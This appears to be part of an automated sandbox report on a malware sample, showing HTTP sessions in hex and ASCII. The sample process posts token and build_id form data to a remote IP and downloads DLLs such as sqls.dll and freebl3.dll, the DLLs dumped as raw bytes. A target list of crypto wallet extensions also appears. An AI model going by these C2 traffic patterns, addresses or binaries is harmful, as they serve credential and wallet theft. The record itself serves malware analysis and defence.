                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.85309737.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:19 UTC277OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 5329
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:19 UTC5329OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KJEGCFBGDHJJJJJKJECFCont
                                                            2024-05-27 13:24:20 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.85309837.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:21 UTC192OUTGET /sqls.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:21 UTC248INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:21 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2459136
                                                            Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                            Connection: close
                                                            ETag: "6650696d-258600"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:21 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                            2024-05-27 13:24:21 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                            Data Ascii: X~e!*FW|>|L1146
                                                            2024-05-27 13:24:21 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                            Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                            2024-05-27 13:24:21 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                            Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                            2024-05-27 13:24:21 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                            Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                            2024-05-27 13:24:21 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                            Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                            2024-05-27 13:24:21 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                            Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                            2024-05-27 13:24:22 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                            Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                            2024-05-27 13:24:22 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                            Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                            2024-05-27 13:24:22 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.85309937.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:24 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 829
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:24 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AECAKJJECAEGCBGDHDHCCont
                                                            2024-05-27 13:24:25 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.85310037.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:27 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 437
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:27 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIDBFCBGDBKKECBFCGIECont
                                                            2024-05-27 13:24:28 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.85310137.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:29 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 437
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:29 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DAKFIDHDGIEGCAKFIIJKCont
                                                            2024-05-27 13:24:30 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.85310237.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:30 UTC171OUTGET /freebl3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:31 UTC246INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:30 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 685392
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-a7550"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:31 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                            Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
